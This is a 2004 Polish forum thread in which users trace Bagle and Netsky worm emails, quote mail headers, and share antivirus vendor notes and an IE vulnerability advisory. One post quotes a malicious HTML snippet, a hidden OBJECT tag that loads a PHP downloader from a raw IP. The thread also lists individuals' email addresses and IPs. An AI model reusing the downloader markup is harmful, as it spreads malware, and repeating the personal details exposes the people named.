Top Info
najistotniejsze informacje z tematu |
|
Zobacz poprzedni temat :: Zobacz następny temat |
Autor |
Wiadomość |
DJ Lotos Root Admin
Dołączył: 19 Sty 2003 Posty: 3342 Skąd: PL/state: lubuskie Wiek: 46 lat(a)
|
Wysłany: 11 Mar 2004 13:38 Temat postu: |
|
|
moon napisał: |
Chwileczke... chwileczke...
DJ: Jakie jest IP z ktorego przychodza te wirusy? Wklej naglowek tego maila. Pozniej moze dojdziesz ktory z userow tego forum jest zawiruszony. Przeciez IP przy wyslanych postach sie zapisuja[...] |
Łatwo powiedziec... gorzej jak zainfekowana osoba nie napisala ani jednego posta na tym forum
A takich jest cala masa wiec gorzej bedzie namierzyc bo trzeba by trzepac baze i szukac w logach... a jesli to byl gosc to tym bardziej do niego nie dotrzesz zeby mu powiedziec nie majac maila tylko gołe IP a kopie html-i na jego HDD w TMP dalej beda slużyly jako lista mailingowa dla wirusa
Aktualnie jednego schwytalem i jest z: siec.sulechow.net, 195.116.20.198
Ale co z tego jak w tej sieci moze siedziec z kilkaset osob ('przy dobrym wietrze' ) za routerem
heya _________________ Podobno wszechświat i głupota ludzka są nieograniczone...
Co do tego drugiego nie ma wątpliwości... A. Einstein
Dlatego zawsze korzystaj z FAQ, Szukaj i Instalatora |
|
Powrót do góry |
|
|
Adv Bot
Dołączył: 01 Sty 1970 Posty:
|
|
Powrót do góry |
|
|
moon VIP
Dołączył: 07 Mar 2003 Posty: 926 Skąd: Warszawa
|
Wysłany: 11 Mar 2004 13:52 Temat postu: |
|
|
Zadnego IP z sieci lokalnej?
mozesz forwardowac naglowek z tego zawirusowanego maila do tej firmy:
KABEL-SAT Spółka z o. o.
Os. Konstytucji 3 Maja 2/1
66-100 Sulechów
tel. (068) 3855581
tel. kom. 0609682726 email: kabel-sat@sulechow.net
Moze powiadomiom tego osiolka... Ja kiedys jednego z AGH ta metoda uciszylem... _________________ I feel like the Blind Man, in a Dark Room,
looking for the Black Cat - That is Not There
Przeczytaj http://rtfm.bsdzine.org zanim zadasz pytanie! |
|
Powrót do góry |
|
|
DJ Lotos Root Admin
Dołączył: 19 Sty 2003 Posty: 3342 Skąd: PL/state: lubuskie Wiek: 46 lat(a)
|
Wysłany: 11 Mar 2004 15:00 Temat postu: |
|
|
oj chyba bym sie nalatal jak glupi
kolejny z: ip52.t3.ds.pwr.wroc.pl, 156.17.225.52
szukanie igły w stogu siana jednym slowem _________________ Podobno wszechświat i głupota ludzka są nieograniczone...
Co do tego drugiego nie ma wątpliwości... A. Einstein
Dlatego zawsze korzystaj z FAQ, Szukaj i Instalatora |
|
Powrót do góry |
|
|
moon VIP
Dołączył: 07 Mar 2003 Posty: 926 Skąd: Warszawa
|
Wysłany: 11 Mar 2004 15:44 Temat postu: |
|
|
No niestety... To walka z wiatrakami... _________________ I feel like the Blind Man, in a Dark Room,
looking for the Black Cat - That is Not There
Przeczytaj http://rtfm.bsdzine.org zanim zadasz pytanie! |
|
Powrót do góry |
|
|
hiisi Kataryna
Dołączył: 09 Sty 2004 Posty: 115 Skąd: Kraków Wiek: 44 lat(a)
|
Wysłany: 12 Mar 2004 21:48 Temat postu: |
|
|
Cytat: |
Return-Path: <djlotos_xx@wp.peel>
Received: from mx.go2.pl (mx.go2.pl [212.126.20.5]) by box3.go2.pl SERVER; Fri, 12 Mar 2004 17:49:33 +0100
X-mf: first3.pl v0.6
Received: by mx.go2.pl (Postfix) id 2DBB91338AC; Fri, 12 Mar 2004 17:49:25 +0100 (CET)
Delivered-To: hiisi_cv@o2.peel
Received: from Kujawa Milosz (pd212.lomza.sdi.tpnet.pl [213.77.177.212]) by mx.go2.pl (Postfix) with SMTP id 166741339CA for <hiisi@o2.peel>; Fri, 12 Mar 2004 17:49:19 +0100 (CET)
Date: Fri, 12 Mar 2004 17:49:14 +0100
To: hiisi_nn@o2.pl
Subject: ello! =))
From: djlotos_xx@wp.peel
Message-ID: <qnaxnfjbuwwfgmfadgv@wp.peel>
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="--------dydtqlwelqidknooydqe"
I don't bite, weah!
..btw, "70246" is a password for archive |
DjLotos o to chodzilo? Mowisz masz...oczywiscie zalacznik celowo otworzylem, zawieral Worm.Bagle H...
ale rozpoznany przez antywira zostal:)
Ostatnio zmieniony przez hiisi dnia 13 Mar 2004 4:05, w całości zmieniany 1 raz |
|
Powrót do góry |
|
|
DJ Lotos Root Admin
Dołączył: 19 Sty 2003 Posty: 3342 Skąd: PL/state: lubuskie Wiek: 46 lat(a)
|
Wysłany: 12 Mar 2004 22:40 Temat postu: |
|
|
tak, o to chodzilo, w sumie o to co pogrubilem w tym co zacytowałeś
adresów mailowych raczej nie podawaj w postach, zmniejszysz ryzyko pobrania ich z html-i przez wirusy i ponownego ataku _________________ Podobno wszechświat i głupota ludzka są nieograniczone...
Co do tego drugiego nie ma wątpliwości... A. Einstein
Dlatego zawsze korzystaj z FAQ, Szukaj i Instalatora |
|
Powrót do góry |
|
|
mina86 Weteran
Dołączył: 18 Sty 2003 Posty: 686 Skąd: Linux 2.6.x x86_64 Wiek: 38 lat(a)
|
Wysłany: 13 Mar 2004 11:35 Temat postu: |
|
|
Nosicieli może być kilkuset zacznijmy od tego... Poza tym nie koniecznie wirusy muszą ciągnąć adresy email z tego forum.. Mogą ciągnąć je z jakichś innych stron.. Osobiście dostaje około 20-30 takich mailii dziennie i stweirdziłem, że nie ma sensu się w nic bawić z tym... _________________ Post wygenerowany automatycznie przez system sztucznej inteligencji o kodowej nazwie mina86
Myślałem, że jest wolność słowa...
i wtedy właśnie kazali mi usunąć adres strony z tej stopki. |
|
Powrót do góry |
|
|
Bags_Bunny VIP
Dołączył: 02 Lut 2003 Posty: 365 Skąd: Poznań
|
Wysłany: 17 Mar 2004 20:48 Temat postu: |
|
|
teraz w ogole zajebioza.... jeden znajomy dostal maila z adresu xxx@jabberpl.org
--edit--
jeszcze cos... ofiara jak i posiadacz tego jid'a wypowiadaja sie na tym samym forum (rowniez phpbb) _________________ php ma w zasadzie tylko jedna zalete - dziala | fatal error: ms windows system found |
|
Powrót do góry |
|
|
kopar Gaduła
Dołączył: 06 Sty 2004 Posty: 51 Skąd: Kętrzyn/Warszawa
|
Wysłany: 19 Mar 2004 1:34 Temat postu: aloha wirusiarze |
|
|
proponuję wejść na stronę symantec 'ai poczytać sobie w jaki sposób te gówniane Beagle itp. zdobywają maile, ja z forum nie dostaję ale za to od znajomych moich znajomych itd. ale w YAMNIe wywalam je od razu na serwerze... |
|
Powrót do góry |
|
|
DJ Lotos Root Admin
Dołączył: 19 Sty 2003 Posty: 3342 Skąd: PL/state: lubuskie Wiek: 46 lat(a)
|
Wysłany: 19 Mar 2004 16:03 Temat postu: |
|
|
Nie wiem jak u innych ale u mnie w tym calym stosie kilkudziesieciu zawirusowanych maili dziennie przez Netsky.C i D zaczely wyrastac nieco inne kwiatki
W temacie maja zazwyczaj Encrypted document jednak nie zawieraja zadnego załącznika i na pierwszy rzut oka nawet nie zawierają treści
Treścia maila jest krótka wstawka HTML zawierająca przekierowanie na dokument PHP, ktory to z kolei generuje prezentacje Flash (na szczescie cale to zasr... ActiveX mam totalnie wylaczone w przegladarce ) jednak podczas przegladania moze sie pojawic oprocz infa alertu zabezpieczen okienko konsolowe niczym Pascalowski output window w wersji na Windy (TPW)
Tresc wyglada tak
Kod: |
<html><body>
<font face="System">
<OBJECT STYLE="display:none" DATA="http://68.190.193.38:81/915353.php">
</OBJECT></body></html> |
nie wiem czy jeszcze nie dostalem z innego IP, trzeba bedzie wyhaczyc, dlugo nie trzeba bedzie czekac, próbka już poszla do MkS
#EDIT
no i juz mam odpowiedź
MkS napisał: |
To efekt dzialania gdzies w internecie robaka klasy Beagle, list jest
"sciagaczem" wirusa VBS.Zeroline, od dawna juz wykrywanego przez mks-vir'a.
Jednak sama konstrukcja sluzaca do sciagania wirusa jest calkowicie legalna,
mimo tego mks_vir bedzie ja wykrywal od dziesiejszej wersji. |
Szybka reakcja i upgrade
Wiecej o tym:
http://mks.com.pl/baza.html?show=description&id=2696
http://mks.com.pl/baza.html?show=description&id=2698
http://mks.com.pl/baza.html?show=description&id=2699
#EDIT2
Jak zauwazylem to adresem mailowym, z ktorego regularnie dostaje wirusy, czyli miedzy innymi losowymi nadawcami ten wystepuje regularnie za kazdym razem i z niego dostaje najczesciej, jest jakby jednym ze wspolnych mianownikow, ktory moze byc adresem faktycznego nosiciela
Jest nim osoba posiadajaca mail jurek(at)tlen.pl, IP zrodla wysylanej wiadomosci: ft130.internetdsl.tpnet.pl, 80.53.45.130
Jesli jest to mail, ktoregos z forumowiczow to prosze o przeskanowanie swojego systemu programem antywirusowym z najnowsza bazą poniewaz bardzo prawdopodobne jest, ze posiada w swoim systemie aktywne kopie przynajmniej kilku róznych wirusów
Inny IP (jeden z wielu), ktory posługuje sie moim adresem email i wysyla wirusy do przypadkowych odbiorcow to: fotosypniewski.konin.pl (c13-61.icpnet.pl), 62.21.13.61
Najciekawsza sprawa jest, ze wirusy majac wlasne silniki SMTP prawdopodobnie podszywają sie pod OE6
Cytat: |
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 |
Pozdr _________________ Podobno wszechświat i głupota ludzka są nieograniczone...
Co do tego drugiego nie ma wątpliwości... A. Einstein
Dlatego zawsze korzystaj z FAQ, Szukaj i Instalatora |
|
Powrót do góry |
|
|
GhostRider Gaduła
Dołączył: 11 Kwi 2004 Posty: 30 Skąd: Poland
|
Wysłany: 11 Kwi 2004 18:44 Temat postu: Hehe |
|
|
A phpbb jest dziurwe jak sito! Koniec opowiści 8) |
|
Powrót do góry |
|
|
DJ Lotos Root Admin
Dołączył: 19 Sty 2003 Posty: 3342 Skąd: PL/state: lubuskie Wiek: 46 lat(a)
|
Wysłany: 12 Kwi 2004 12:01 Temat postu: |
|
|
no tak, co fakt troche je polatalem
IE tez jest dziurawe z tym, ze za swoje produkty M$ kaze sobie placic i to nie malo a phpBB jest za free wiec nie ma co sie zbytnio krzywic
krzywic to sie mozna na IE jak sie przeczyta o kolejnej dziurze
FrazPC napisał: |
Nowa, już wykorzystywana luka w Internet Explorer!
Luka występuje w implementacji protokołu ITS używanego m.in. do wyświetlania skompilowanych plików pomocy chm. Zagrożeni są użytkownicy Internet Eksplorera we wszystkich systemach Windows. UWAGA! Nie istnieje jeszcze łata na tę lukę, więc pomóc może tylko zmiana niektórych ustawień systemowych.
Możliwe jest wykorzystanie tej luki do uruchomienia dowolnego pliku z prawami użytkownika lokalnego. Można to zrobić zarówno za pomocą odpowiednio spreparowanego maila, jak również na stronie www. Lukę tę wykorzystują już nowe odmiany wirusów i trojanów.
Pełne zabezpieczenie się przed wykorzystaniem tej luki nie jest jeszcze możliwe. Można jedynie ograniczyć jej implikacje przez wyłączenie protokołu ITS. Mogą jednak, wówczas, przestać działać niektóre pliki pomocy i narażone może być, w znacznym stopniu funkcjonowanie systemu. Najlepszą ochroną będzie więc, przykładanie jak największej uwagi przy otwieraniu plików i uważne śledzenie skąd przychodzą adresowane do nas maile.
Ustawienia, które można zmienić, aby zmniejszyć ryzyko infekcji:
zmiana nazwy lub usunięcie następującego klucza w rejestrze:
HKEY_LOCAL_MACHINESOFTWAREClassesPROTOCOLSHandler{ms-its,ms-itss,its,mk}
UWAGA! Najlepiej skopiować sobie ten klucz do pliku (eksport), aby po opublikowaniu przez producenta łaty móc go przywrócić.
inne działania które mogą zmniejszyć ryzyko wykorzystania dziury:
wyłączenie skryptów i kontrolek ActiveX we wszystkich strefach - zarowno Internetowej jak i lokalnej
nie uruchamianie nieznanych linków - zarówno znalezionych w Internecie, jak i otrzymanych pocztą (to zalecenie powtarzamy od dawna i nadal jest bardzo aktualne)
jak najczęstsze uaktualnianie bazy programów antywirusowych - mogą one uchronić nas przed wirusami wykorzystującymi tę lukę, ale nie przed bezpośrednim użyciem np. na spreparowanej stronie!
-------------------------------------------------------------------
Źródło -> http://www.mks.com.pl/baza.html?show=description&id=2736 |
_________________ Podobno wszechświat i głupota ludzka są nieograniczone...
Co do tego drugiego nie ma wątpliwości... A. Einstein
Dlatego zawsze korzystaj z FAQ, Szukaj i Instalatora |
|
Powrót do góry |
|
|
leon_master Weteran
Dołączył: 28 Sty 2004 Posty: 705 Skąd: Gliwice Wiek: 36 lat(a)
|
Wysłany: 16 Maj 2004 15:33 Temat postu: |
|
|
a mnie taki gnojek napieprza od miesiaca. na tydzien ze 3 razy beagle.
Nagłówek napisał: |
X-POP3-Rcpt: lperczak@dns
Return-Path: <michu.michal@interia.pl>
Received: from assa-ynb7318pr6.com (nat2.dami-rz.pl [80.48.176.2])
by dns.sensor.com.pl (8.12.11/8.12.11) with SMTP id i4EA8fK3011281
for <--------@multivision.com.pl>; Fri, 14 May 2004 12:08:56 +0200
Date: Fri, 14 May 2004 12:08:31 +0100
To: "Lech.perczak" <----------------@multivision.com.pl>
From: "Michu.michal" <michu.michal@interia.pl>
Subject: New changes
Message-ID: <ybxukkaoijlqddyqnms@multivision.com.pl>
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="--------hofvuoiqffoypsbttuhn"
X-Virus-Scanned: by AMaViS - amavis-milter (http://www.amavis.org/)
X-Spam-Status: No, hits=-1.0 required=5.0 tests=AWL,BAYES_20,HTML_50_60,
HTML_IMAGE_ONLY_02,HTML_MESSAGE,MIME_HTML_ONLY autolearn=no
version=2.61
X-Spam-Checker-Version: SpamAssassin 2.61 (1.212.2.1-2003-12-09-exp) on
dns.sensor.com.pl
|
czyli ip 80.48.176.2
traceroute sie urywa w okolicach 11 przeskoku ode mnie.
to moze ciagnac nie wiadomo skad.
aha jak goscia powiadomilem to mnie zbluzgal. jakby sie tu znalazl na forum to mnie powiadomic. raz tez mialem przypadek ze mail rzekomo ode mnie nie doszedl do ambasady jakiejstam chyba w Grecji kraju bo byl zalacznik EXE. po naglowkach zauwazylem ze jakis amerykaniec. powiadomienie wyslal mi mailer-demon tejze ambasady. |
|
Powrót do góry |
|
|
|